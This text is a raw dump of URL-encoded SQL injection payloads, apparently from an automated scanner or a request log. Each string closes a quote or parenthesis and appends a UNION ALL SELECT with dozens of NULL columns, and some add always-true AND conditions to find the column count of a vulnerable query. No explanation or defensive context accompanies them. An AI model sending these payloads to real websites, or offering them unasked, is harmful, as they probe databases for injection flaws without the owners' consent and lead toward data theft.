1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%282647%3D2647 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%283694%3D3694 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%286974%3D6974 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%282382%3D2382 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%282752%3D2752 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%286194%3D6194 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%287008%3D7008 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%287611%3D7611 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%287828%3D7828 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%284758%3D4758 1%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%284216%3D4216 1%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%288748%3D8748 1%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%283055%3D3055 